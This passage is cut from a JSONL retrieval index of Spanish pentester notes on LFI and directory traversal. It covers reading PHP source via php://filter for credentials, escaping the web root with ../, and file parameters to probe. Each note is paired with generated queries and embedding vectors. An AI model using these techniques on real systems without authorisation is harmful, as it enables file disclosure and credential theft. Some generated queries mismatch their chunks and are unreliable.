-0.07356, 0.00548, -0.06203, 0.08086, 0.05479, 0.01766, 0.00971, 0.04196, 0.06532, -0.07721, 0.09832, 0.04137, -0.05727, 0.00072, -0.06403, 0.07492, 0.06121, -0.11204, -0.0446, 0.01069, -0.06472, -0.05336, -0.07229, -0.01584, 0.0161, 0.02423, 0.00263, -0.14232, -0.12446, -0.05671, 0.0026, 0.05555, -0.18196, 0.09831, 0.05316, -0.02256, -0.09021, -0.07985, 0.026, 0.07941, -0.02527, -0.08608, 0.03246, 0.01466, -0.08018, -0.13977, -0.09773, 0.02374, 0.07363, -0.01711, 0.0196, 0.01653, 0.04696, -0.03642, -0.04229, -0.04695, 0.04972, 0.02691, -0.01191, 0.05782, -0.14265, 0.0692, -0.00822, 0.06158, -0.01148, -0.01294, 0.09794, -0.0231, 0.05756, -0.01237, 0.03014, -0.03468, -0.14183, 0.00175, 0.0489, 0.01025, -0.0096, -0.02705, -0.0488, -0.01527, -0.06502, 0.0194, -0.10267, -0.05872, 0.01778, -0.03903, 0.05318, -0.01628, -0.02117, 0.08162, -0.04679, -0.00993, -0.10523, -0.09689, -0.09421, 0.08883, 0.03095, 0.12919, -0.02529, 0.01199, 0.09344, -0.01239, -0.00957, 0.04288, -0.06294, 0.0133, -0.04962, -0.00565, -0.07311, -0.03393, 0.03014, -0.0536, -0.07105, -0.01541, -0.04149, -0.11056, 0.03142, -0.04002, -0.07426, 0.00355, -0.05101, 0.01129, -0.03858, -0.00095, -0.03027, -0.04207, 0.02493, -0.02189, 0.01408, 0.09933, 0.07862, 0.07324, 0.0441, -0.06962, 0.0293, -0.07663, -0.03039, -0.04605, -0.03095, -0.02198, 0.06416, 0.00823, 0.05058, 0.0618, 0.02468, -0.00572, 0.01351, 0.08147, -0.04862, 0.03088, 0.0327, 0.04518, 0.03148, -0.09082, 0.02964, -0.00522, 0.01895, -0.01427, 0.03572, -0.03358, -0.14986, 0.06461, 0.02725, -0.0277, 0.10733, 0.05182, -0.02356, -0.03001, 0.02605, -0.01489, 0.04804, -0.02233, -0.02829, 0.00495, -0.00704, 0.03717, 0.03147, 0.04492, -0.00949, -0.12098, 0.02476, 0.00986, -0.05728, 0.02541, 0.02779, 0.01496, 0.04594, -0.01588, 0.01629, -0.00889, 0.00735, -0.01524, -0.05014, 0.02395, -0.0377, -0.04127, -0.01749, 0.00713, 0.0295, -0.03797, -0.07066, 0.07558, -0.0179, -0.03247, -0.05636, 0.04449, -0.05657, -0.005, -0.05111, 0.01374, 0.00426, -0.03693, -0.02568, 0.02956, 0.04243, 0.05897]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## php://filter\nLee el cΓ³digo fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web Β· Directory traversal Β· File upload bypass Β· Reverse shell Β· OSCP MOC", "indexar": "que herramienta lee cΓ³digo fuente en base64 para encontrar credenciales?", "v": [0.03886, -0.0468, -0.13693, -0.09786, -0.02421, -0.23323, -0.01487, -0.05401, -0.0248, -0.12398, -0.05751, 0.02361, -0.07077, -0.09731, 0.02525, 0.01472, 0.03598, -0.13427, -0.08647, -0.12044, -0.06837, -0.09989, -0.09696, -0.09264, -0.09734, -0.00468, -0.06533, -0.08445, -0.08078, 0.00194, 0.08771, -0.02347, -0.03678, 0.08281, -0.16858, -0.03511, -0.06979, 0.07698, -0.09238, 0.0496, -0.01659, 0.06606, -0.13674, 0.20133, -0.03618, -0.04351, 0.02029, 0.06182, 0.09818, -0.03383, -0.08511, -0.21333, -0.17697, -0.03865, -0.02007, -0.19262, 0.11238, -0.05602, -0.03011, 0.0041, -0.08073, -0.02204, 0.06779, -0.11238, -0.01638, 0.01008, 0.10222, 0.00872, -0.10005, 0.01415, -0.08368, 0.08214, -0.11474, -0.02993, 0.04031, 0.02212, 0.06296, -0.03655, 0.01491, 0.08519, -0.00751, 0.02663, -0.04225, -0.04534, -0.01571, -0.05233, 0.06294, -0.04895, -0.00443, -0.06696, 0.12536, 0.0447, -0.0253, 0.06663, -0.01504, 0.00256, 0.01359, 0.00716, 0.00989, 0.01593, 0.02891, -0.12751, 0.01464, -0.0005, 0.09488, 0.01342, 0.09309, -0.06313, -0.07915, 0.02622, -0.03864, 0.05807, 0.00197, 0.05499, 0.00757, 0.00601, -0.02999, 0.0279, 0.04951, -0.10019, 0.02231, 0.06928, -0.07957, 0.01729, 0.02674, 0.05816, -0.02873, 0.03045, -0.0114, -0.10415, -0.07233, -0.03478, -0.02058, 0.09023, -0.02128, 0.09243, 0.03513, -0.07075, -0.02934, -0.05297, 0.05423, 0.00617, 0.00592, -0.00245, 0.10047, 0.0918, 0.06617, -0.04973, -0.09058, -0.06279, 0.03165, 0.04944, -0.0022, -0.01591, -0.07591, 0.02927, 0.03109, 0.04336, -0.0854, -0.01956, -0.06747, -0.03389, 0.00484, -0.00081, -0.03848, -0.05695, 0.05531, -0.05429, -0.04691, 0.02211, 0.02331, 0.06757, 0.05232, -0.05273, -0.00829, -0.05878, -0.0674, -0.04175, -0.04677, -0.01945, 0.02495, 0.019, 0.07169, -0.02631, 0.0293, -0.03635, -0.00843, 0.00701, -0.02046, -0.03376, 0.04651, -0.03869, -0.03522, -0.00734, -0.03921, 0.01456, 0.03735, -0.00789, -0.00391, -0.08796, -0.06435, 0.06289, -0.04314, -0.02706, 0.02921, 0.01354, 0.04579, -0.04574, -0.09293, 0.09886, 0.01156, -0.03005, 0.01342, -0.01715, -0.03197, -0.0138, 0.03525, 0.00135, 0.02484, -0.06368, 0.04795, -0.03067, -0.02592, -0.03282, -0.0308, 0.03545, 0.02015, 0.02482, 0.04404, -0.0066, -0.05418, -0.0306, -0.06598, -0.01033, 0.01592, -0.05791, -0.0341, 0.05378, -0.04605, -0.06267, 0.01853, 0.00257, -0.03702, -0.04794, -0.01035, -0.02873, -0.04042, -0.005, 0.00222, -0.02983, -0.01326, 0.02083, 0.08857, -0.03058, -0.01207, -0.01335]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## php://filter\nLee el cΓ³digo fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web Β· Directory traversal Β· File upload bypass Β· Reverse shell Β· OSCP MOC", "indexar": "con que puedo buscar credenciales ocultas o vectores de ataque en el cΓ³digo fuente de una web?", "v": [0.1081, -0.03758, -0.18378, -0.0286, -0.04894, -0.01748, 0.09938, 0.00716, 0.05625, -0.15892, -0.04095, -0.12514, -0.11534, -0.0573, 0.12761, 0.01739, 0.15717, -0.0887, 0.06453, -0.02621, 0.04754, -0.15382, -0.02985, -0.05326, -0.0467, 0.04245, -0.04486, 0.09878, -0.00586, -0.07767, -0.00964, -0.02201, 0.01937, 0.10056, -0.0713, 0.03256, -0.0861, 0.07452, -0.02149, 0.07044, -0.03077, 0.05403, -0.15836, 0.02383, 0.03618, -0.04916, -0.04809, 0.03934, -0.00645, -0.07728, -0.10504, -0.09459, -0.24634, -0.01446, -0.0336, -0.04724, 0.12437, -0.01106, 0.02883, 0.0224, -0.05245, 0.02459, 0.03223, -0.13918, -0.01184, -0.01703, 0.02975, 0.03388, -0.12581, -0.03283, -0.00349, 0.03234, -0.00514, -0.00551, 0.10227, 0.02962, -0.00245, -0.01416, 0.0198, 0.08835, -0.04961, -0.04743, -0.07119, 0.04179, -0.03178, -0.03624, 0.02085, -0.03245, -0.08664, -0.12857, 0.07693, 0.05575, -0.04117, 0.00726, -0.07355, 0.00867, 0.01859, -0.03476, 0.05656, 0.0032, -0.03243, -0.09886, -0.10253, 0.10319, 0.1236, 0.08123, 0.04271, -0.06024, -0.00366, -0.04598, -0.01522, -0.09573, -0.08409, -0.08333, -0.01799, -0.0204, -0.05584, -0.00768, 0.02972, -0.0541, -0.08171, -0.00182, -0.09598, 0.10912, -0.04554, 0.04905, -0.04829, 0.03688, 0.0111, -0.07082, -0.10952, -0.0213, -0.03572, -0.00259, -0.00617, 0.04193, 0.01461, -0.06262, 0.02657, 0.04761, 0.03588, 0.02055, 0.04121, -0.02379, 0.05369, 0.01723, -0.02813, -0.09603, -0.13904, -0.06423, -0.01474, 0.10675, 0.0436, 0.06344, -0.09446, 0.05497, 0.0054, -0.03858, -0.03826, 0.05287, -0.00727, 0.0767, -0.08648, -0.00318, -0.01906, -0.04404, -0.03491, -0.06664, 0.04124, 0.01335, -0.02522, 0.02499, 8e-05, -0.11306, 0.05148, -0.04055, -0.04796, -0.11238, 0.04394, -0.02086, 0.02065, 0.02776, -0.01483, 0.00313, -0.02894, -0.0205, 0.08841, 0.01563, 0.00576, -0.03392, 0.0352, -0.00563, -0.00727, 0.08517, -0.00484, -0.04092, 0.01712, 0.05533, 0.00342, -0.0755, -0.06818, 0.03613, -0.01853, -0.06501, 0.02568, 0.07229, -0.06526, -0.02525, -0.05845, 0.08191, 0.07739, -0.06689, 0.11976, -0.09974, -0.05652, -0.02101, 0.01301, -0.00363, 0.01648, -0.02487, 0.02947, 0.02312, -0.00101, 0.03647, 0.03293, -0.04769, 0.00527, 0.00951, 0.01543, 0.05815, -0.04283, -0.008, -0.03556, -0.06086, 0.07128, 0.01808, -0.01681, 0.00105, -0.09244, -0.02594, -0.00782, -0.00946, -0.01914, -0.04799, -0.02833, -0.0802, -0.10742, -0.00112, 0.00777, -0.04218, -0.04508, 0.03701, 0.0583, -0.06722, 0.07963, -0.04042]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## php://filter\nLee el cΓ³digo fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web Β· Directory traversal Β· File upload bypass Β· Reverse shell Β· OSCP MOC", "indexar": "que programa sirve para detectar SQL injection y configuraciones expuestas leyendo base64?", "v": [0.10576, -0.02211, -0.26136, -0.2061, 0.07839, -0.2743, -0.0475, -0.13621, 0.00116, -0.02198, -0.06338, 0.01145, -0.0495, -0.12298, 0.00185, 0.00906, 0.04665, -0.14661, -0.10047, -0.08298, -0.02023, -0.02152, 0.01178, -0.07467, -0.04698, 0.03154, -0.07483, -0.10458, 0.02199, -0.0728, -0.02483, -0.05124, -0.03205, 0.01612, -0.07836, -0.03169, -0.11684, -0.00578, -0.03616, 0.01653, 0.04191, 0.02873, -0.13669, 0.14843, 0.04564, -0.01915, 0.06373, -0.01903, 0.0505, -0.06189, -0.00235, -0.02196, -0.11024, -0.03992, -0.00053, -0.16181, 0.03611, -0.05853, 0.0781, 0.02708, -0.04509, 0.04795, 0.08219, -0.03222, 0.02751, 0.01027, 0.03861, 0.00271, -0.01138, 0.04636, -0.09826, 0.02701, -0.09709, -0.05111, 0.07446, 0.04693, 0.12174, -0.00018, 0.12604, 0.02485, -0.094, 0.03379, -0.06683, 0.06264, -0.03987, -0.02513, 0.07777, -0.05113, 0.03486, -0.03987, 0.1289, -0.01937, 0.00436, 0.06611, 0.03672, -0.02935, 0.09634, -0.00302, -0.00451, 0.03014, 0.00256, -0.10402, -0.04848, 0.06736, 0.05553, 0.04991, 0.14041, -0.09368, -0.04059, -0.03928, -0.00072, 0.05591, -0.03467, -0.04335, 0.00662, -0.01042, 0.05496, 0.07071, 0.04453, -0.02293, -0.08989, 0.05267, -0.02804, 0.03715, 0.04727, -0.05971, -0.06268, 0.05135, -0.03007, 0.07163, -0.03114, 0.02304, -0.03059, 0.05268, -0.14664, 0.07146, 0.01797, -0.09274, -0.09586, -0.08113, 0.08361, 0.03145, 0.02023, 0.01349, 0.08959, 0.07214, 0.07893, -0.02378, -0.08824, -0.00695, 0.05865, -0.00277, 0.05756, 0.00874, -0.08936, -0.02153, 0.04368, -0.01105, -0.06923, 0.01641, -0.07401, 0.04182, 0.00756, 0.00659, 0.00476, -0.03673, 0.01434, -0.06359, 0.05226, 0.0594, 0.00176, 0.11916, 0.02817, -0.0633, -0.0222, 0.01232, -0.06441, -0.04904, 0.07236, -0.00136, -0.01995, -0.0335, 0.05539, -0.01743, 0.01032, -0.05277, -0.06651, 0.01594, 0.01095, -0.0476, 0.08876, -0.04099, -0.06637, -0.01413, -0.01193, -0.01286, -0.00931, 0.00381, 0.03759, -0.08419, -0.03604, -0.00547, -0.0616, 0.00133, 0.00027, 0.02745, -0.0057, 0.00969, -0.03962, 0.09848, -0.01373, -0.04054, 0.01454, 0.02062, -0.05874, -0.00707, 0.02015, 0.01209, 0.04941, 0.00455, 0.01047, -0.02836, 0.03183, -0.03049, -0.02204, 0.00352, 0.00584, -0.03065, 0.09737, -0.00862, -0.06138, -0.01656, -0.06462, 0.03537, 0.01713, -0.06629, -0.02053, 0.01844, -0.03777, -0.07697, 0.06914, 0.06268, -0.0238, -0.02593, 0.00166, -0.03549, -0.0763, 0.0152, 0.01172, -0.04069, -0.02182, 0.05853, 0.07669, -0.03329, -0.01314, 0.03142]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Directory traversal\n\n> Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web.", "indexar": "que tecnica sirve para leer archivos aleatorios desde un servidor web?", "v": [-0.044, -0.10208, -0.10423, -0.18397, -0.06757, -0.16645, 0.01408, -0.07996, 0.11231, 0.00747, -0.18753, -0.07634, 0.09836, -0.03309, 0.1233, 0.04628, 0.23566, -0.12113, 0.17562, 0.00638, -0.00657, 0.10715, -0.04482, -0.04535, -0.03072, -0.05068, 0.05831, -0.09622, -0.1227, 0.02424, -0.09441, 0.02504, 0.07727, 0.03177, -0.00675, 0.04775, -0.02297, 0.09896, -0.08664, 0.15062, -0.01051, 0.00375, -0.07322, 0.01804, 0.03818, -0.04149, 0.13414, -0.04827, 0.04581, -0.02226, -0.02046, -0.03124, -0.0456, 0.01586, -0.13554, -0.00287, 0.09683, -0.16537, 0.04569, -0.08458, -0.14107, 0.02491, -0.05703, -0.06952, 0.05449, -0.02952, -0.04325, -0.00119, -0.08754, -0.03188, -0.06961, 0.0731, 0.04218, -0.0397, -0.03412, 0.06787, 0.00738, 0.04296, 0.01379, -0.01204, 0.09683, 0.02211, -0.09649, 0.06068, -0.04686, -0.07642, 0.00089, 0.00034, 0.07267, -0.03848, 0.09229, 0.12599, -0.08526, -0.02028, 0.02269, -0.0407, 0.10785, -0.06775, 0.01247, -0.03941, 0.04639, 0.00837, -0.00149, 0.05732, 0.08773, 0.1631, 0.12745, -0.01824, -0.00398, -0.05203, 0.07716, 0.01394, -0.03151, 0.06062, -0.10026, -0.01212, 0.0228, -0.01274, 0.01946, 0.04556, -0.03827, 0.01241, 0.00668, 0.02727, 0.01259, -0.01789, 0.08126, -0.02716, -0.01549, -0.01154, 0.0245, -0.03107, -0.09828, 0.03016, -0.05943, 0.0374, 0.11327, -0.02514, -0.12367, -0.02259, 0.08397, 0.05107, -0.07206, 0.03959, 0.07022, -0.06007, 0.12301, -0.0855, -0.06836, -0.09131, -0.01569, -0.06202, -0.04397, 0.002, -0.11352, -0.0209, -0.00264, -0.12532, -0.05825, 0.05287, -0.00055, 0.06538, 0.0221, 0.05876, -0.02942, -0.02919, -0.07015, 0.02524, 0.04208, 0.0179, 0.00251, 0.03341, -0.03446, -0.06255, 0.01487, 0.04291, -0.0732, -0.04348, 0.00525, -0.00534, -0.04774, -0.05569, 0.00269, 0.04294, -0.03252, -0.02044, 0.04798, -0.01812, -0.03031, 0.03275, -0.00082, -0.02464, -0.10045, 0.03767, 0.01635, -0.05339, -0.05506, -0.01219, -0.00426, -0.03877, 0.00222, -0.04147, -0.03965, 0.00826, -0.03049, 0.00059, 0.01186, -0.04925, -0.01082, -0.01175, -0.0217, -0.01934, 0.08138, -0.06204, 0.01978, -0.02644, 0.05936, -0.03562, -0.01482, -0.01007, 0.02223, -0.03036, -0.01989, -0.00837, 0.02533, 0.03501, -0.01608, -0.0282, 0.01764, 0.00034, -0.03717, 0.01963, -0.00692, 0.02737, -0.00287, -0.01921, 0.01102, 0.00232, -0.05321, -0.03126, -0.02069, 0.03769, -0.01947, -0.01226, 0.00722, -0.08497, -0.02343, -0.03755, -0.02303, -0.00527, -0.00357, -0.05326, -0.00218, 0.00109, 0.00324, 0.01159]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Directory traversal\n\n> Salir del directorio web con `../` para **leer ficheros arbitrarios**. Distinto de LFI a RCE: traversal solo **lee**; LFI **incluye/ejecuta**. Vector de Hacking web.", "indexar": "como puedo salir del directorio actual con ../ para acceder a otros archivos?", "v": [0.08662, 0.01258, -0.11868, -0.0023, -0.0528, -0.05737, 0.0312, -0.01829, -0.11803, 0.06028, -0.14872, -0.18435, -0.00786, -0.19242, 0.01526, -0.02481, 0.17482, 0.00688, -0.01385, -0.03027, 0.06502, 0.17413, 0.00742, 0.01414, 0.00951, -0.05711, -0.02962, 0.06335, -0.15917, -0.00982, -0.0183, 0.03101, 0.0797, -0.09302, -0.02549, 0.02055, 0.09121, 0.17952, -0.11299, 0.06249, 0.03668, 0.05071, -0.0782, 0.09056, -0.05561, -0.08424, 0.01944, 0.01344, 0.031, -0.04383, 0.02815, -0.00199, -0.06161, 0.08316, -0.11372, -0.0086, 0.06726, -0.09822, 0.10031, -0.03525, -0.07574, 0.11675, -0.08679, 0.05532, -0.09631, 0.04539, 0.00111, 0.00447, -0.15866, 0.07256, -0.09495, 0.08487, 0.05271, 0.02272, -0.07234, -0.03265, 0.0004, -0.03858, -0.05566, 0.03068, 0.0435, -0.03429, 0.07433, -0.01159, -0.13206, -0.17945, 0.01974, -0.08043, -0.02238, -0.05865, 0.11311, -0.00348, -0.10961, 0.00915, -0.01759, -0.04251, -0.04613, -0.0347, -0.05992, -0.07525, -0.05024, 0.0552, -0.04473, 0.15802, 0.06799, 0.06104, 0.04331, 0.05143, -0.09384, 0.02037, 0.02769, 0.02859, 0.06204, -0.00296, -0.07343, 0.03672, -0.11939, -0.05148, 0.00849, -0.08566, -0.05683, -0.09478, -0.0062, 0.01034, -0.00759, -0.03261, 0.08001, 0.07539, -0.06405, 0.03309, 0.04049, 0.01543, -0.05672, 0.03499, -0.0902, -0.00358, 0.04626, 0.02856, 0.00144, -0.03925, 0.10653, -0.00417, 0.02538, -0.04235, 0.03412, -0.04711, -0.0468, -0.05888, -0.0738, -0.1441, -0.01767, 0.03626, -0.02596, -0.01098, 0.04802, 0.00425, 0.0685, -0.04866, 0.0193, 0.02428, -0.03262, -0.00663, -0.11075, 0.01878, -0.1389, -0.04002, -0.01482, 0.00713, 0.05051, -0.00058, 0.0093, 0.07167, -0.01375, -0.07935, 0.00807, 0.0024, -0.00557, -0.12586, 0.06339, 0.00303, 0.00678, 0.00202, -0.05324, -0.01193, -0.05906, -0.02498, 0.09655, 0.01142, -0.00839, 0.09231, 0.00587, 0.04723, 0.01378, 0.00166, 0.00523, -0.00435, -0.02334, 0.03278, -0.00307, -0.00833, -0.05107, 0.00271, -0.02828, 0.02358, 0.07072, 0.02091, -0.02979, 0.04666, -0.01846, -0.0154, 0.04617, 0.00078, 0.07424, -0.00834, -0.03399, 0.01, -0.01006, 0.05294, 0.03972, -0.0188, -0.03019, 0.0638, 0.07671, 0.02176, 0.00049, -0.00932, -0.02808, -0.05514, -0.01137, 0.01167, -0.05752, 0.02828, 0.00349, -0.00971, 0.03366, 0.02973, -0.02779, 0.00408, -0.07007, -0.04912, 0.00636, 0.12555, -0.04298, 0.03017, -0.05931, -0.02211, -0.06437, -0.00403, 0.01513, -0.06369, -0.02015, 0.03077, 0.0035, -0.00356, 0.0121, -0.01745]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde\nParΓ‘metros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "indexar": "quΓ© parΓ‘metro sirvo para especificar un archivo en la URL?", "v": [0.03926, -0.0782, 0.05111, -0.12791, -0.03575, -0.13843, 0.10723, -0.18227, -0.06121, 0.04107, -0.07653, -0.13043, 0.08418, -0.09155, 0.05682, -0.04601, 0.13507, 0.03487, 0.16311, 0.0394, 0.09412, 0.13518, -0.04866, -0.04314, -0.17562, -0.03628, -0.0885, 0.05927, -0.1479, -0.01228, -0.01144, 0.19639, 0.01927, -0.03875, -0.10073, 0.16277, 0.16374, 0.09181, -0.06972, 0.05987, -0.00965, 0.02137, -0.02183, 0.03177, -0.06043, -0.14471, 0.09694, -0.01236, 0.07067, -0.00632, -0.00843, 0.01313, -0.07927, 0.0751, -0.03489, -0.03051, -0.03956, -0.08732, 0.10853, -8e-05, 0.01894, -0.06086, -0.01741, -0.02366, -0.10332, 0.02474, -0.01079, 0.01265, -0.05867, -0.08759, -0.06453, 0.06832, 0.05144, 0.01369, -0.01179, 0.028, -0.11272, -0.17475, 0.02551, 0.07728, -0.0501, 0.09075, 0.01516, -0.10749, -0.07059, 0.05011, 0.07662, 0.08093, 0.03358, -0.02331, -0.0094, 0.03752, -0.00969, -0.0105, -0.02485, -0.02134, -0.02638, 0.09203, -0.02773, -0.00278, 0.01408, -0.00069, -0.05748, 0.01466, 0.06293, 0.02046, -0.00558, 0.0356, -0.05444, 0.00242, 0.06544, 0.0722, 0.04549, 0.0219, -0.03968, -0.02036, 0.01088, -0.02467, -0.00801, -0.05915, -0.08826, -0.0188, -0.00122, 0.0383, -0.0793, -0.01295, 0.00796, 0.08694, -0.03648, 0.092, -0.0235, 0.02761, -0.06788, -0.02006, -0.01964, 0.11527, 0.15737, 0.03457, -0.09887, 0.04935, 0.04298, -0.09387, -0.09788, 0.10569, 0.0483, -0.01322, -0.02451, 0.05038, -0.09113, -0.02953, 0.04531, -0.03335, 0.02577, -0.11394, -0.0562, -0.03787, 0.05002, -0.08287, -0.03267, -0.02288, 0.01647, 0.05403, -0.04636, -0.11584, 0.03343, -0.04865, -0.03001, -0.03483, 0.01752, -0.08435, 0.01529, 0.01366, -0.05102, -0.10533, 0.01007, 0.04279, 0.0113, -0.05592, 0.02378, 0.0761, 0.00744, -0.041, 0.06029, 0.08548, 0.01825, -0.04297, 0.08052, -0.07067, -0.02921, 0.06663, -0.04633, -0.03268, 0.05289, 0.04931, 0.04515, 0.00659, -0.01904, -0.00603, -0.06589, 0.02156, 0.0144, -0.06897, -0.01407, 0.01495, 0.02564, 0.00076, -0.01743, -0.09132, -0.01914, 0.00671, 0.04712, 0.02194, 0.02549, 0.01062, -0.01477, 0.03812, 0.01062, 0.08229, 0.01686, -0.00099, -0.02054, 0.02977, -0.00339, -0.01385, 0.0193, 0.00444, 0.00322, 0.02967, -0.02444, -0.0246, -0.01002, 0.02037, -0.02664, 0.03936, 0.02194, -0.058, -0.01026, 0.05048, -0.00822, -0.04569, -0.05219, 0.02842, -0.05292, 0.00619, -0.04104, 0.01445, -0.0067, 0.05134, -0.01577, -0.06433, -0.05587, -0.04379, -0.03182, -0.00664, 0.01384, -0.01119]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde\nParΓ‘metros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "indexar": "con quΓ© puedo indicar una direcciΓ³n de descarga directa?", "v": [-0.12198, 0.23044, -0.22148, -0.02483, 0.11147, -0.01699, 0.04144, 0.04941, -0.09353, -0.0525, -0.00339, -0.1833, -0.0568, -0.22094, -0.00614, -0.03362, 0.14118, 0.02449, 0.03726, -0.11874, 0.071, -0.0799, -0.0571, -0.07603, -0.09954, -0.07546, -0.02612, 0.02505, -0.13296, -0.04592, -0.00152, -0.03566, 0.05497, 0.00257, -0.02374, 0.09754, 0.01396, 0.13724, 0.15117, 0.05186, -0.05357, 0.04325, -0.09171, 0.05604, -0.04533, -0.07617, 0.0438, -0.01917, -0.0267, -0.11472, 0.00214, -0.0041, -0.09527, -0.02378, -0.10719, -0.03575, 0.06754, -0.05649, 0.0805, -0.04498, 0.08569, 0.03368, -0.0434, 0.09408, 0.07675, -0.02228, 0.06327, -0.02241, -0.10833, -0.10408, -0.04048, -0.01298, -0.06318, 0.06037, 0.05218, 0.08705, -0.07071, 0.02786, 0.05568, 0.0061, 0.10464, -0.00945, -0.03104, -0.0543, -0.06072, -0.08204, 0.00346, -0.09357, -0.06249, -0.13722, 0.02392, -0.06172, -0.04223, -0.01464, -0.0859, -0.01202, -0.0733, 0.01419, 0.05156, 0.03056, -0.04754, 0.03849, 0.00909, 0.11831, 0.10731, 0.02528, 0.01565, -0.11895, -0.03015, 0.01796, 0.01739, -0.01093, -0.01184, -0.04718, -0.02674, -0.04602, -0.08817, -0.02699, -0.02475, -0.02218, -0.10275, -0.02215, 0.00725, 0.0737, -0.01175, -0.02035, -0.0046, 0.05457, -0.0027, 0.01016, -0.02209, -0.01063, -0.03433, 0.00073, 0.02093, -0.00128, -0.04012, 0.02813, 0.03273, -0.10633, 0.08632, -0.06371, -0.01835, -0.05345, -0.0511, -0.05476, -5e-05, -0.13884, -0.0369, -0.02599, 0.0458, 0.06202, 0.05836, 0.01932, 0.06995, 0.05494, 0.08408, -0.01843, -0.00698, 0.05876, -0.03771, 0.00563, -0.04376, -0.04486, -0.01788, -0.07014, -0.05954, -0.01259, 0.01097, 0.04049, -0.0628, 0.07206, -0.06293, -0.07917, -0.00908, -0.06938, -0.00769, -0.05297, 0.06244, 0.00069, -0.03494, 0.01432, -0.06978, -0.01372, -0.03781, -0.00329, 0.03371, 0.0071, 0.01187, 0.04105, 0.01606, 0.07949, -0.05296, -0.00583, -0.02924, 0.00614, 0.01974, 0.03283, -0.02804, 0.00177, -0.04653, -0.01724, -0.02642, -0.00936, 0.07153, 0.00876, -0.05, 0.07416, -0.04515, 0.0123, 0.00157, -0.01966, 0.08103, -0.04795, -0.08823, 0.02132, 0.02125, -0.00398, -0.03993, 0.04611, -0.04926, 0.04263, 0.16039, -0.04018, 0.04061, 0.03262, 0.02203, 0.00917, -0.00636, 0.08526, 0.00317, 0.06513, -0.01191, -0.04419, 0.06502, 0.02346, 0.014, 0.0165, -0.0495, -0.01025, 0.03924, 0.08791, -0.01831, -0.03693, -0.07632, -0.0569, -0.03281, 0.01577, 0.00902, -0.0877, -0.06172, 0.03829, 0.05601, -0.01383, -0.01795, -0.03567]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde\nParΓ‘metros que apuntan a ficheros: `?file=`, `?page=`, `?download=`, `?doc=`, `?path=`, `?lang=`.", "indexar": "cΓ³mo hago para filtrar por lenguaje usando el query string?", "v": [0.01812, 0.03124, -0.05753, -0.13834, -0.02237, -0.12004, -0.07131, -0.00793, -0.06863, -0.06437, -0.05703, 0.01004, -0.04945, -0.01371, 0.0428, -0.06711, 0.05673, -0.04502, -0.06509, -0.06364, -0.05129, 0.01835, -0.16634, -0.1184, -0.09486, -0.0969, 0.09028, -0.06877, -0.07269, -0.02062, -0.06493, 0.06837, 0.13904, 0.00911, -0.1244, 0.13469, 0.00434, 0.12473, -0.03401, 0.13273, 0.03126, 0.01544, -0.08655, 0.06752, -0.0378, -0.02017, 0.04654, -0.05944, -0.00044, 0.0029, 0.00993, 0.03792, -0.10979, 0.09586, -0.06546, -0.02234, 0.07686, -0.11253, 0.03087, -0.07618, -0.01864, -0.07483, 0.07024, 0.05071, 0.01444, -0.08512, 0.05862, 0.01288, -0.01048, 0.00494, -0.02967, -0.0088, -0.07591, 0.05645, 0.08526, 0.11044, 0.09205, -0.11154, 0.15222, -0.00938, -0.06653, -0.07786, 0.00429, -0.06427, -0.06864, 0.0055, 0.07946, -0.08284, 0.00742, -0.08318, -0.05877, -0.00855, -0.11598, -0.13118, -0.03583, -0.06751, -0.00493, -0.04932, 0.06226, -0.01129, 0.05485, -0.08327, -0.07615, 0.13998, -0.00477, -0.03598, 0.04003, -0.0768, -0.00366, -0.0344, 0.04369, -0.04793, -0.00142, -0.17149, 0.03663, -0.04564, 0.0957, -0.08467, -0.00939, 0.03027, -0.01461, 0.02845, -0.08173, -0.00334, 0.06251, 0.00996, 0.08421, 0.07458, -0.02417, -0.01666, -0.007, 0.05896, -0.04363, -0.05184, 0.00661, 0.09347, 0.10308, -0.03079, -0.02426, -0.05011, -0.08599, 0.03959, -0.04421, 0.03382, 0.11083, 0.01743, 0.11465, -0.08005, -0.09245, 0.05173, 0.05896, -0.09573, 0.07324, 0.0273, -0.05091, -0.05747, 0.10134, -0.08591, -0.07458, -0.01357, -0.01878, 0.01607, -0.06786, 0.00196, 0.06925, -0.0181, -0.07002, -0.03729, 0.13463, -0.07335, 0.07631, -0.03134, 0.01449, 0.01948, -0.0429, 0.06911, 0.03929, 0.05388, -0.037, -0.09532, -0.00206, -0.00808, -0.08633, -0.04674, 0.02261, -0.02282, 